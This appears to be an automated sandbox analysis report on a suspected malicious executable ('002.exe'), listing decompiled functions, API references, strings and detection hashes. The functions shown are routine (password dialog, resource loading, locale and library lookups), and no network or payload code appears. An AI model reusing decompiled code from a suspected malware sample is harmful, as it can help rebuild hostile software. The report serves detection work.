                                                                                                                • Instruction Fuzzy Hash: 592191716043559FCB089F64D995E6A77A4FF48310B04916DF90AAF392DB72EC02CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED25B7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 81%
                                                                                                                			E00ED25B7(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16) {
				void* _v4100;
				void* __ebx;
				int _t18;
				void* _t20;
				signed int _t23;
				void* _t26;
				signed int _t29;
				signed int _t31;
				signed int _t33;
				struct HWND__* _t47;
				void* _t52;

				E00ED3370();
				if( *0xf10b72 == 0) {
					_t47 =  *0xf0ca58; // 0x8020e
					if(_a4 == 2) {
						_t23 = IsWindowVisible(_t47);
						asm("sbb eax, eax");
						_t47 = _t47 &  ~_t23;
					}
					E00EC3343(_a8, _a12,  &_v4100, 0x800);
					_t18 = DialogBoxParamW( *0xf0ca40, L"GETPASSWORD1", _t47, E00ECFC60,  &_v4100);
					_t26 = _a16;
					if(_t18 == 0) {
						E00EC582D(_t26, _t26, 0xee7544);
						 *0xf0ca34 = 1;
						_t20 = 0;
					} else {
						_t31 = 0x40;
						memcpy(_t26, 0xf1b0e8, _t31 << 2);
						_t52 = _t52 + 0xc;
						_t20 = 1;
						asm("movsw");
					}
					if( *((char*)(_t26 + 0x100)) != 0) {
						_t29 = 0x40;
						_t20 = memcpy(0xf10a72, _t26, _t29 << 2);
						asm("movsw");
					}
				} else {
					_t33 = 0x40;
					_t20 = memcpy(_a16, 0xf10a72, _t33 << 2);
					asm("movsw");
				}
				return _t20;
			}














                                                                                                                0x00ed25bf
                                                                                                                0x00ed25d0
                                                                                                                0x00ed25ea
                                                                                                                0x00ed25f0
                                                                                                                0x00ed25f3
                                                                                                                0x00ed25fb
                                                                                                                0x00ed25fd
                                                                                                                0x00ed25fd
                                                                                                                0x00ed2612
                                                                                                                0x00ed262f
                                                                                                                0x00ed2635
                                                                                                                0x00ed263a
                                                                                                                0x00ed2656
                                                                                                                0x00ed265b
                                                                                                                0x00ed2662
                                                                                                                0x00ed263c
                                                                                                                0x00ed263e
                                                                                                                0x00ed2646
                                                                                                                0x00ed2646
                                                                                                                0x00ed264a
                                                                                                                0x00ed264b
                                                                                                                0x00ed264b
                                                                                                                0x00ed266b
                                                                                                                0x00ed266f
                                                                                                                0x00ed2677
                                                                                                                0x00ed2679
                                                                                                                0x00ed2679
                                                                                                                0x00ed25d2
                                                                                                                0x00ed25dc
                                                                                                                0x00ed25dd
                                                                                                                0x00ed25df
                                                                                                                0x00ed25df
                                                                                                                0x00ed2681

                                                                                                                APIs
                                                                                                                • IsWindowVisible.USER32(0008020E), ref: 00ED25F3
                                                                                                                • DialogBoxParamW.USER32(GETPASSWORD1,0008020E,Function_0000FC60,?), ref: 00ED262F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: DialogParamVisibleWindow
                                                                                                                • String ID: GETPASSWORD1
                                                                                                                • API String ID: 3157717868-3292211884
                                                                                                                • Opcode ID: 5fc0fa8b9cc96a5d5923719b6fdbd1f87c536c539798faaa7967d4019043cce2
                                                                                                                • Instruction ID: dbb769da0ce827f0aa8b7a9300ff6b81e9eaf18168ca65e2fc695f111996bcda
                                                                                                                • Opcode Fuzzy Hash: 5fc0fa8b9cc96a5d5923719b6fdbd1f87c536c539798faaa7967d4019043cce2
                                                                                                                • Instruction Fuzzy Hash: 6A11223260434C6BDB21DF34AD01FEA3798FB09710F045069FE49B7282DAB59C82A7A4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC5772, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00EC56F3: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00EC5712
                                                                                                                  • Part of subcall function 00EC56F3: GetProcAddress.KERNEL32(00EFAFE0,CryptUnprotectMemory), ref: 00EC5722
                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,00EC576C), ref: 00EC5804
                                                                                                                Strings
                                                                                                                • CryptProtectMemory failed, xrefs: 00EC57BB
                                                                                                                • CryptUnprotectMemory failed, xrefs: 00EC57FC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$CurrentProcess
                                                                                                                • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                • API String ID: 2190909847-396321323
                                                                                                                • Opcode ID: 6a12d762ecf43a0bcac3efe06a599e8e1dc2028e387a7dc080cbce84818dfbcb
                                                                                                                • Instruction ID: 4f33aeb5f580f81ea59ca53cb4fcbb17a31b88d0a70e4c876b901d0902b6cb9f
                                                                                                                • Opcode Fuzzy Hash: 6a12d762ecf43a0bcac3efe06a599e8e1dc2028e387a7dc080cbce84818dfbcb
                                                                                                                • Instruction Fuzzy Hash: 55110273A04A64ABDB185B21ED41F6E3B94EF44724B04506EF805BF291CB36BD828BD1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED00BD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00ED00BD(void* __ecx, void* __edx, void* __fp0) {
				signed int _v20;
				signed int _v24;
				void _v28;
				void* _t11;
				void* _t13;
				signed int _t18;
				signed int _t19;
				void* _t21;
				void* _t22;
				void* _t26;
				void* _t32;

				_t32 = __fp0;
				_t21 = __edx;
				_t22 = LoadBitmapW( *0xf0ca3c, 0x65);
				_t19 = _t18 & 0xffffff00 | _t22 == 0x00000000;
				_t28 = _t19;
				if(_t19 != 0) {
					_t22 = E00ECF19A(0x65);
				}
				GetObjectW(_t22, 0x18,  &_v28);
				if(E00ECF08A(_t28) != 0) {
					if(_t19 != 0) {
						_t26 = E00ECF19A(0x66);
						if(_t26 != 0) {
							 *0xf26020(_t22);
							_t22 = _t26;
						}
					}
					_t11 = E00ECF0EC(_v20);
					_t13 = E00ECF2DB(_t21, _t32, _t22, E00ECF0A9(_v24), _t11);
					 *0xf26020(_t22);
					_t22 = _t13;
				}
				return _t22;
			}














                                                                                                                0x00ed00bd
                                                                                                                0x00ed00bd
                                                                                                                0x00ed00d3
                                                                                                                0x00ed00d7
                                                                                                                0x00ed00da
                                                                                                                0x00ed00dc
                                                                                                                0x00ed00e5
                                                                                                                0x00ed00e5
                                                                                                                0x00ed00ee
                                                                                                                0x00ed00fb
                                                                                                                0x00ed0100
                                                                                                                0x00ed0109
                                                                                                                0x00ed010d
                                                                                                                0x00ed0110
                                                                                                                0x00ed0116
                                                                                                                0x00ed0116
                                                                                                                0x00ed010d
                                                                                                                0x00ed011b
                                                                                                                0x00ed012b
                                                                                                                0x00ed0133
                                                                                                                0x00ed0139
                                                                                                                0x00ed013b
                                                                                                                0x00ed0143

                                                                                                                APIs
                                                                                                                • LoadBitmapW.USER32(00000065), ref: 00ED00CD
                                                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 00ED00EE
                                                                                                                  • Part of subcall function 00ECF19A: FindResourceW.KERNEL32(00ED0109,PNG,?,?,?,00ED0109,00000066), ref: 00ECF1AC
                                                                                                                  • Part of subcall function 00ECF19A: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00ED0109,00000066), ref: 00ECF1C4
                                                                                                                  • Part of subcall function 00ECF19A: LoadResource.KERNEL32(00000000,?,?,?,00ED0109,00000066), ref: 00ECF1D7
                                                                                                                  • Part of subcall function 00ECF19A: LockResource.KERNEL32(00000000,?,?,?,00ED0109,00000066), ref: 00ECF1E2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Resource$Load$BitmapFindLockObjectSizeof
                                                                                                                • String ID: 9,
                                                                                                                • API String ID: 1955601194-4106540983
                                                                                                                • Opcode ID: c7f4899851efd52fafc648ff1018627917b3f062d6898e2d5a37bbf1f215099a
                                                                                                                • Instruction ID: caeb614761adedec4709ea5edc5b0d6af6a662ff859af212f4c1ffc90e55bb7c
                                                                                                                • Opcode Fuzzy Hash: c7f4899851efd52fafc648ff1018627917b3f062d6898e2d5a37bbf1f215099a
                                                                                                                • Instruction Fuzzy Hash: 6701DF3268120867C62073249D16F7E7AEEEF85B52F085125F900F7292DE228C17A6E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC4A6A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00EC4A6A(void* __eflags, int _a4, WCHAR* _a8, int _a12) {
				void* _t14;
				WCHAR* _t15;

				_t15 = _a8;
				_t2 =  &_a12; // 0xec746c
				 *_t15 = 0;
				if(E00EC3EDA(0xf10b88, _t14, __eflags, _a4, _t15,  *_t2, 0, 0) == 0 && LoadStringW( *0xf0ca3c, _a4, _t15, _a12) == 0) {
					LoadStringW( *0xf0ca40, _a4, _t15, _a12);
				}
				return _t15;
			}





                                                                                                                0x00ec4a6e
                                                                                                                0x00ec4a75
                                                                                                                0x00ec4a7d
                                                                                                                0x00ec4a8b
                                                                                                                0x00ec4ab1
                                                                                                                0x00ec4ab1
                                                                                                                0x00ec4abb

                                                                                                                APIs
                                                                                                                • LoadStringW.USER32(?,00000096,?,?), ref: 00EC4A9A
                                                                                                                • LoadStringW.USER32(?,00000096,?), ref: 00EC4AB1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: LoadString
                                                                                                                • String ID: lt
                                                                                                                • API String ID: 2948472770-177123393
                                                                                                                • Opcode ID: 6111912dd86ccf61a324e21605d58497f035e331550d93de26abd1d7979086a1
                                                                                                                • Instruction ID: 0c6334754481b3dd8dfcd4949f2b8fca51fd287cbace64bef95a8c179b0911e8
                                                                                                                • Opcode Fuzzy Hash: 6111912dd86ccf61a324e21605d58497f035e331550d93de26abd1d7979086a1
                                                                                                                • Instruction Fuzzy Hash: 58F0F835200258BBCF115F51EC14DEA7F69FF157A5B005019FD04A6131D6329961EBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC3DC1, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00EC3DC1(void* __ebx, void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
				char _v84;
				char _v244;
				void* __esi;

				_push(_a8);
				E00EC37E6( &_v244, 0x50, L"$%s:%s", _a4);
				E00EC799C( &_v244,  &_v84, 0x50);
				_t6 =  &_a16; // 0xec3d60
				return E00EC3F18(__ebx, __ecx, __ecx,  &_v84, _a12,  *_t6);
			}






                                                                                                                0x00ec3dd1
                                                                                                                0x00ec3de1
                                                                                                                0x00ec3df6
                                                                                                                0x00ec3dfb
                                                                                                                0x00ec3e10

                                                                                                                APIs
                                                                                                                • _swprintf.LIBCMT ref: 00EC3DE1
                                                                                                                  • Part of subcall function 00EC37E6: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00EC37F9
                                                                                                                  • Part of subcall function 00EC799C: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,EG,?,00000000,00000000,?,?,?,00EC4745,?,?,00000050), ref: 00EC79B9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide__vswprintf_c_l_swprintf
                                                                                                                • String ID: $%s:%s$`=
                                                                                                                • API String ID: 2347781027-774057444
                                                                                                                • Opcode ID: b07435e1ae266305c42579f5dee3f894db7ba4b7366859f732c47e11e952c7b7
                                                                                                                • Instruction ID: 46bc52d6b628bf7c013508af57ae5fe2ddca60de3283c8951f6a101818b9c8d8
                                                                                                                • Opcode Fuzzy Hash: b07435e1ae266305c42579f5dee3f894db7ba4b7366859f732c47e11e952c7b7
                                                                                                                • Instruction Fuzzy Hash: C5F0827294421E76CF20AAA08C06FEF7B6CAB04300F00046AB90876182E6729A259BA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC46B9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00EC46B9(void* __ecx) {
				struct HRSRC__* _t3;
				void* _t5;

				_t5 = __ecx;
				_t3 = FindResourceW(GetModuleHandleW(0), L"RTL", 5);
				if(_t3 != 0) {
					 *((char*)(_t5 + 0x64)) = 1;
					return _t3;
				}
				return _t3;
			}





                                                                                                                0x00ec46bc
                                                                                                                0x00ec46cc
                                                                                                                0x00ec46d4
                                                                                                                0x00ec46d6
                                                                                                                0x00000000
                                                                                                                0x00ec46d6
                                                                                                                0x00ec46db

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00EC3F7F,?), ref: 00EC46BE
                                                                                                                • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00EC3F7F,?), ref: 00EC46CC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FindHandleModuleResource
                                                                                                                • String ID: RTL
                                                                                                                • API String ID: 3537982541-834975271
                                                                                                                • Opcode ID: 0699f52b068170c73ae2e8b971d6ad77a6683114f030e2d6968b8ca902ec5899
                                                                                                                • Instruction ID: e0c1e556e04db60f2e6cc456dc4e91e9ffc50a6a9bf95b334afdf7de378f4255
                                                                                                                • Opcode Fuzzy Hash: 0699f52b068170c73ae2e8b971d6ad77a6683114f030e2d6968b8ca902ec5899
                                                                                                                • Instruction Fuzzy Hash: 5AC0123164C7955AD7305B767C6DB832A445B01B15F050448B585BD6D0D5A5E845C760
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Analysis Process: 002.exe PID: 3568 Parent PID: 4576 002.exeCOMMON

                                                                                                                Executed Functions

                                                                                                                Function 01270E2E, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 46%
                                                                                                                			E01270E2E(intOrPtr _a4, int _a8, short* _a12, int _a16) {
				_Unknown_base(*)()* _t9;
				void* _t12;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t14;
				_Unknown_base(*)()* _t16;

				_t9 =  *0x1389e94; // 0xad50525a
				if(_t9 != 0) {
					__imp__DecodePointer(_t9); // executed
					_t16 = _t9;
					L4:
					if(_t16 == 0) {
						L6:
						return GetLocaleInfoW(E01296AF5(_a4), _a8, _a12, _a16);
					}
					_t12 =  *_t16(_a4, _a8, _a12, _a16); // executed
					return _t12;
				}
				_t13 = GetModuleHandleW(L"kernel32.dll");
				if(_t13 == 0) {
					goto L6;
				}
				_t14 = GetProcAddress(_t13, "GetLocaleInfoEx");
				_t16 = _t14;
				__imp__EncodePointer(_t16);
				 *0x1389e94 = _t14;
				goto L4;
			}








                                                                                                                0x01270e31
                                                                                                                0x01270e39
                                                                                                                0x01270e67
                                                                                                                0x01270e6d
                                                                                                                0x01270e6f
                                                                                                                0x01270e71
                                                                                                                0x01270e83
                                                                                                                0x00000000
                                                                                                                0x01270e96
                                                                                                                0x01270e7f
                                                                                                                0x00000000
                                                                                                                0x01270e7f
                                                                                                                0x01270e40
                                                                                                                0x01270e48
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01270e50
                                                                                                                0x01270e56
                                                                                                                0x01270e59
                                                                                                                0x01270e5f
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0126477D,?,00000003,?,00000004,?,00000000), ref: 01270E40
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 01270E50
                                                                                                                • EncodePointer.KERNEL32(00000000,?,0126477D,?,00000003,?,00000004,?,00000000), ref: 01270E59
                                                                                                                • RtlDecodePointer.NTDLL(AD50525A,?,?,0126477D,?,00000003,?,00000004,?,00000000), ref: 01270E67
                                                                                                                • GetLocaleInfoEx.KERNELBASE(?,00000004,?,00000003,?,0126477D,?,00000003,?,00000004,?,00000000), ref: 01270E7F
                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000004,?,00000003,?,0126477D,?,00000003,?,00000004,?,00000000), ref: 01270E96
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: InfoLocalePointer$AddressDecodeEncodeHandleModuleProc
                                                                                                                • String ID: GetLocaleInfoEx$kernel32.dll
                                                                                                                • API String ID: 3226634038-1547310189
                                                                                                                • Opcode ID: 1e80d13d26f8917e4576035e34b85d492f933b88b7562fd2dd3e34a34a9a4756
                                                                                                                • Instruction ID: 1833af286335ce91c26feb054391ac7457e9f37874d518e1095d9dee9b2a85c6
                                                                                                                • Opcode Fuzzy Hash: 1e80d13d26f8917e4576035e34b85d492f933b88b7562fd2dd3e34a34a9a4756
                                                                                                                • Instruction Fuzzy Hash: D0F03C32820216EFEF226FA8FC0D8AF3F69EF097647004469FE0996114D771D9A09B64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01262070, Relevance: 7.7, APIs: 5, Instructions: 194librarysleeploaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • IsBadReadPtr.KERNEL32(?,00000014,012AB8F0), ref: 012620A1
                                                                                                                • LoadLibraryA.KERNELBASE(00000000), ref: 012620BE
                                                                                                                • GetProcAddress.KERNEL32(?,00000007), ref: 0126218F
                                                                                                                • IsBadReadPtr.KERNEL32(?,00000014,00000000,?,?,?,?,012623CA,?,00000000), ref: 012621B8
                                                                                                                • Sleep.KERNEL32(00000009), ref: 012621E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Read$AddressLibraryLoadProcSleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 1736333232-0
                                                                                                                • Opcode ID: c233915afdc5d30a02d155871c01c31a4fa2cb40477832f26134511e444c7254
                                                                                                                • Instruction ID: 7e10065b726a0ec2966154a120e622f7075ddb0d01cf0fa2dcc74e7cdff17731
                                                                                                                • Opcode Fuzzy Hash: c233915afdc5d30a02d155871c01c31a4fa2cb40477832f26134511e444c7254
                                                                                                                • Instruction Fuzzy Hash: 8C41CF75A25206DBDB208F2CDC84769F7A8FF05324F1445EAEA15E7382D7B1E981CB80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126294A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • OutputDebugStringA.KERNEL32(IsolationAware function called after IsolationAwareCleanup,-00000034,?,01262A26,00000000,012A4F00,00000010,0127ED09,?,?,?,0129BD34,?,?,0000000C,0127ED62), ref: 0126295E
                                                                                                                • GetLastError.KERNEL32(?,-00000034,?,01262A26,00000000,012A4F00,00000010,0127ED09,?,?,?,0129BD34,?,?,0000000C,0127ED62), ref: 01262995
                                                                                                                Strings
                                                                                                                • IsolationAware function called after IsolationAwareCleanup, xrefs: 01262959
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: DebugErrorLastOutputString
                                                                                                                • String ID: IsolationAware function called after IsolationAwareCleanup
                                                                                                                • API String ID: 4132100945-2690750368
                                                                                                                • Opcode ID: e44fab219290e42b786f72c31fd97b6c8bd1fbc942a00971cf6bed6b6b7bc3aa
                                                                                                                • Instruction ID: fe3412fd358864815dc6082f99ea98769e1ceb9a3d01d2cd08e1f5beb6b4015e
                                                                                                                • Opcode Fuzzy Hash: e44fab219290e42b786f72c31fd97b6c8bd1fbc942a00971cf6bed6b6b7bc3aa
                                                                                                                • Instruction Fuzzy Hash: CFF02B71972323D79B355BBDA90476F7BAC6B85BD17240011FB00D5084D760C8C1CBE2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10008B24, Relevance: 2.0, APIs: 1, Instructions: 470COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 431132790-0
                                                                                                                • Opcode ID: 976dfe1631b6bcc0c6c03e0ad4a6af3c5ab45de1b1c3e776385805f6048881cd
                                                                                                                • Instruction ID: dce7c3b15fa2d65ea008e8b47a90386296bc5c22004b292fe31d8d06a307bd0b
                                                                                                                • Opcode Fuzzy Hash: 976dfe1631b6bcc0c6c03e0ad4a6af3c5ab45de1b1c3e776385805f6048881cd
                                                                                                                • Instruction Fuzzy Hash: 0F02D374C046998EFB15CF68C8906EDBBF6FF593D0F14421AD8C1A725AD7709A82CB80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01269311, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 01269318
                                                                                                                  • Part of subcall function 01270323: LocalAlloc.KERNEL32(00000040,?,?,0127085D,00000010,?,?,00000000,?,00000004,012692B4,01266D6E,012692DD,01266B4B,01296BCA), ref: 0127032B
                                                                                                                  • Part of subcall function 01269016: __EH_prolog3_catch.LIBCMT ref: 0126901D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
